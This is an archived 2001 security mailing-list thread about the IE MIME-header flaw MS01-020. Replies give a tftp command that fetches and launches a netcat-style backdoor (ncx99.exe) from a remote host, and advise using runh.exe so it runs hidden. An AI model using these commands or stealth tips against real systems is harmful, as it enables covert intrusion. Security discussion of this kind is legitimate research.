OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Dan Gilbert (dan.gilbertDIGEO.COM)
Date: Mon Apr 02 2001 - 12:41:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Try using runh.exe which you can get at www.scripthorizon.com
    <http://www.scripthorizon.com> . It runs things in the background,
    much like using the '&' after a Unix command.
     
    The syntax is something like: runh c:\winnt\system32\tftp.exe -i
    192.168.1.1 GET ncx99.exe
     
    HTH,
    Dan Gilbert
    Senior Systems Engineer
    Digeo, Inc.
    dan.gilbertdigeo.com

    -----Original Message-----
    From: Adriano Dias [mailto:adiasPROTEUS.COM.BR]
    Sent: Friday, March 30, 2001 11:51 AM
    To: FOCUS-MSSECURITYFOCUS.COM
    Subject: RES: Incorrect MIME Header Can Cause IE to Execute E-mail Attachm
    ent

    Hi,
    I´m doing some tests with this vulnerability. I made a file who downloads
    the ncx99.exe and runs it, but i'm having a problem: when it downloads the
    file, it's running minimized, not hided. The commands are following:
    c:\winnt\system32\tftp.exe -i 192.168.1.1 GET ncx99.exe c:\system.exe &&
    start /min c:\nc0.exe
    does anybody have an idea to make it invisible?
     
    Thank you!
     
    Adriano Dias.

    -----Mensagem original-----
    De: Juan Carlos Garcia Cuartango [mailto:cuartangoTERRA.ES]
    Enviada em: Friday, March 30, 2001 6:00 AM
    Para: BUGTRAQSECURITYFOCUS.COM
    Assunto: Incorrect MIME Header Can Cause IE to Execute E-mail Attachment

    Hi,
    Microsoft has released a security bulletin
    <http://www.microsoft.com/technet/security/bulletin/ms01-020.asp>
    http://www.microsoft.com/technet/security/bulletin/ms01-020.asp entitled
    "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment".
    EML files are MIME multipart files that IE 5 will parse. There is a
    vulnerability allowing arbitrary code execution using this kind of files.
    This vulnerabiliy could allow an hostile page or e-mail to perform any
    action on your computer. The vulnerability affects IE 5, IE 5.5 over all
    windows platforms.
    I have prepared some demos about the vulnerability in www.kriptopolis.com
    <http://www.kriptopolis.com> (major spanish security site) :
    http://www.kriptopolis.com/cua/eml.html
    <http://www.kriptopolis.com/cua/eml.html>
    Note : It you want to have a look to the hostile EML files you must click
    the right mouse button over the pictures and select the "Save Target As"
    menu option.
    Regards,
    Juan Carlos G. Cuartango